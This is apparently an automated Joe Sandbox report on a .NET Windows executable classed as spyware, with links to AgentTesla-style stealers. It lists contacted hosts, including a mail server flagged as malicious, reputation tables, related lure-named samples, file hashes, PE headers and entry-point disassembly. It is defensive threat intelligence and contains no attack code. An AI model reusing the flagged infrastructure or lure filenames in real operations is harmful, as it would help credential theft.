                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                        http://mail.nationalkham.com0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn0%VirustotalBrowse
                        http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                        http://www.zhongyicts.com.cn1%VirustotalBrowse
                        http://mail.nationalkham.com0%VirustotalBrowse
                        http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        mail.nationalkham.com
                        192.185.35.67
                        truetrueunknown
                        api.ipify.org
                        104.26.12.205
                        truefalse
                          high
                          ip-api.com
                          208.95.112.1
                          truefalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                              high
                              http://ip-api.com/line/?fields=hostingfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.comSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://account.dyn.com/SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.tiro.comSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designersSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.goodfont.co.krSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://api.ipify.org/tRegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.carterandcone.comlSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.sajatypeworks.comSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.typography.netDSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688552621.0000000005B90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://api.ipify.orgSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cnSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/frere-user.htmlSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://mail.nationalkham.comRegSvcs.exe, 00000002.00000002.4135337637.0000000002BBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://ip-api.comRegSvcs.exe, 00000002.00000002.4135337637.0000000002B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers8SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.fonts.comSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.sandoll.co.krSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.urwpp.deDPleaseSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.zhongyicts.com.cnSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • 1%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.sakkal.comSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              208.95.112.1
                                                              ip-api.comUnited States
                                                              53334TUT-ASUSfalse
                                                              104.26.12.205
                                                              api.ipify.orgUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              192.185.35.67
                                                              mail.nationalkham.comUnited States
                                                              46606UNIFIEDLAYER-AS-1UStrue
                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                              Analysis ID:1431452
                                                              Start date and time:2024-04-25 07:16:05 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 9m 2s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:7
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 99%
                                                              • Number of executed functions: 77
                                                              • Number of non-executed functions: 21
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              TimeTypeDescription
                                                              07:16:56API Interceptor1x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe modified
                                                              07:16:57API Interceptor12562550x Sleep call for process: RegSvcs.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              208.95.112.1SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                              • ip-api.com/json
                                                              Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                              • ip-api.com/json
                                                              Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              PURCHASE ORDER LIST GREEN VALLY CORP PDF.batGet hashmaliciousGuLoaderBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              Umulighed.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              104.26.12.205Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                                              • api.ipify.org/?format=json
                                                              Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                              • api.ipify.org/?format=json
                                                              SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                                              • api.ipify.org/
                                                              lods.cmdGet hashmaliciousRemcosBrowse
                                                              • api.ipify.org/
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              ip-api.comSecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                              • 208.95.112.1
                                                              Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                              • 208.95.112.1
                                                              Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 208.95.112.1
                                                              SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 208.95.112.1
                                                              PURCHASE ORDER LIST GREEN VALLY CORP PDF.batGet hashmaliciousGuLoaderBrowse
                                                              • 208.95.112.1
                                                              Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 208.95.112.1
                                                              QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 208.95.112.1
                                                              DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 208.95.112.1
                                                              Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 208.95.112.1
                                                              Umulighed.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 208.95.112.1
                                                              api.ipify.orgProforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.13.205
                                                              Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.26.12.205
                                                              DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.13.205
                                                              M_F+niestandardowy stempel.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 172.67.74.152
                                                              responsibilityleadpro.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                              • 104.26.12.205
                                                              F#U0130YAT TEKL#U0130F.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                              • 104.26.12.205
                                                              New DHL Shipment Document Arrival Notice.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.13.205
                                                              hesaphareketi_1.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.13.205
                                                              DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 104.26.13.205
                                                              purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.12.205
                                                              mail.nationalkham.comSpare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 192.185.35.67
                                                              QUOTE RNP002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 192.185.35.67
                                                              PRODUCT LIST_002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 192.185.35.67
                                                              SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 192.185.35.67
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUShttp://decktop.us/gORiyfGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.16.117.116
                                                              https://ortelia.com/download-ortelia-curator/Get hashmaliciousHavocBrowse
                                                              • 1.1.1.1
                                                              o7b91j8vnJ.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.163.209
                                                              http://confirmartucuentamsnaquimx.hstn.me/login.live.com_login_verify_credentials_outlook.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 172.64.151.101
                                                              https://ernestjcrist.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2020596-12595&13813e8=https://femininplurielles.comGet hashmaliciousTechSupportScamBrowse
                                                              • 104.21.53.38
                                                              https://fassouyatajadalravuij.blob.core.windows.net/fassouyatajadalravuij/1.html?KIUS8wH0YY7cB2NMwxGsVoa5iezV7W9cvLqamEPM8HdxqBLgYyX6Goh6aNwgjitRkRWLcAfZPzQwfAIRlIAPQ3jfogxjD1t9nA60#cl/26081_md/7/18507/5419/19036/1614238Get hashmaliciousPhisherBrowse
                                                              • 104.21.80.104
                                                              https://windowdefalerts-error0x21702-alert-virus-detected.pages.dev/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                              • 172.66.44.98
                                                              https://windowdefalerts-error0x21701-alert-virus-detected.pages.dev/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                              • 104.21.56.41
                                                              https://www.google.com.np/amp/s/www.google.com%2Furl%3Fsa%3DD%26q%3Dhttps%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fmy-awesome-project-id-35889.appspot.com%2Fo%2Fsos.html%253Falt%253Dmedia%2526token%253D8c2f5cb7-624d-469a-a987-a3c9e3bcaf1c%26ust%3D1714080900000000%26usg%3DAOvVaw34yUu7IQGPgWBmXhCFwzfl%26hl%3Den%26source%3Dgmail#Z2xlbm5Ab2JzaWRpYW5zZWN1cml0eS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.2.184
                                                              https://ppo46-secondary.z8.web.core.windows.net/werrx01USAHTML/?bcda=1-833-293-0124Get hashmaliciousTechSupportScamBrowse
                                                              • 172.67.208.186
                                                              UNIFIEDLAYER-AS-1UShttp://pengoodet.liveGet hashmaliciousUnknownBrowse
                                                              • 69.89.24.98
                                                              http://electricalsworksflorida.com/j6uGet hashmaliciousHTMLPhisherBrowse
                                                              • 192.185.84.91
                                                              https://gamma.app/docs/Shared-Document-9j9g6z8iqo1w0uuGet hashmaliciousHTMLPhisherBrowse
                                                              • 192.185.97.246
                                                              Total Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 192.185.129.60
                                                              https://content.amanet.org/?m=CiGW.81UwlU3LD6ZH5M4ZoUXv03dAeWfC&r=https://control.mailblaze.com/index.php/survey/ps97367sjy584Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                              • 162.241.114.35
                                                              http://keeper.comGet hashmaliciousUnknownBrowse
                                                              • 192.185.65.45
                                                              https://ken.fnh.temporary.site/wp-includes/sitemaps/updateGet hashmaliciousUnknownBrowse
                                                              • 192.185.46.79
                                                              5RiFmXTOMp.elfGet hashmaliciousMiraiBrowse
                                                              • 142.7.26.76
                                                              SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 192.254.225.166
                                                              https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQGet hashmaliciousUnknownBrowse
                                                              • 67.20.113.11
                                                              TUT-ASUSSecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                              • 208.95.112.1
                                                              Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                              • 208.95.112.1
                                                              Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 208.95.112.1
                                                              SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 208.95.112.1
                                                              PURCHASE ORDER LIST GREEN VALLY CORP PDF.batGet hashmaliciousGuLoaderBrowse
                                                              • 208.95.112.1
                                                              Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 208.95.112.1
                                                              QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 208.95.112.1
                                                              DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 208.95.112.1
                                                              Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 208.95.112.1
                                                              Umulighed.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 208.95.112.1
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0eDatabase4.exeGet hashmaliciousUnknownBrowse
                                                              • 104.26.12.205
                                                              UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                              • 104.26.12.205
                                                              Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                              • 104.26.12.205
                                                              Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 104.26.12.205
                                                              https://8fq7c.eceydri.com/WK9D/Get hashmaliciousHTMLPhisherBrowse
                                                              • 104.26.12.205
                                                              FW_ FHAS Inc_ - Private and Confidential.msgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                              • 104.26.12.205
                                                              Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.12.205
                                                              SecuriteInfo.com.Program.Unwanted.5215.4772.1835.exeGet hashmaliciousPureLog StealerBrowse
                                                              • 104.26.12.205
                                                              SecuriteInfo.com.Program.Unwanted.5215.4772.1835.exeGet hashmaliciousPureLog StealerBrowse
                                                              • 104.26.12.205
                                                              https://colmec.it/category/newsGet hashmaliciousUnknownBrowse
                                                              • 104.26.12.205
                                                              No context
                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.34331486778365
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.941749842774642
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                              File name:SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
                                                              File size:724'992 bytes
                                                              MD5:946a0735432aca25fa370970e97a3dbb
                                                              SHA1:9ffac6be378c7379a8ea11a5a439445a46f6bb5c
                                                              SHA256:7628ace4f2627bc65377a8123ce9e05849e4e4b3fd5b862e03ffcee42274ccfb
                                                              SHA512:9a54f14e47637dd6001ec2426111af5cbf18d96ef2d1fc320d15ba86722d7a445029354e91d82b58617180e141f207245ffb0c15b46fdb89253333c85c77f461
                                                              SSDEEP:12288:PWYIPXjxannnHg2r+Eu1ed8MBqIg5B+gZ9r/XIc/P/EtnOG96TchIf6+Xn7M:PWYIPFannnHg2r1uc3Bqr5QgZl/PAOGb
                                                              TLSH:9BF422C923DD8B2BDCB68BF814721574C37CE96B7962E24D5E8202D84A333C1656177B
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)f..............0...... ........... ... ....@.. .......................`............`................................
                                                              Icon Hash:c14e4c4c4c4c4f41
                                                              Entrypoint:0x4b04da
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x6629C211 [Thu Apr 25 02:38:09 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              xor eax, 35455354h
                                                              xor dword ptr [edi+eax*2], esi
                                                              dec eax
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [ebx+4Ah], dl
                                                              push ebx
                                                              cmp byte ptr [eax+edi+34h], al
                                                              inc ebx
                                                              inc ebx
                                                              xor al, 37h
                                                              xor eax, 00000035h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb04880x4f.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x1008.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
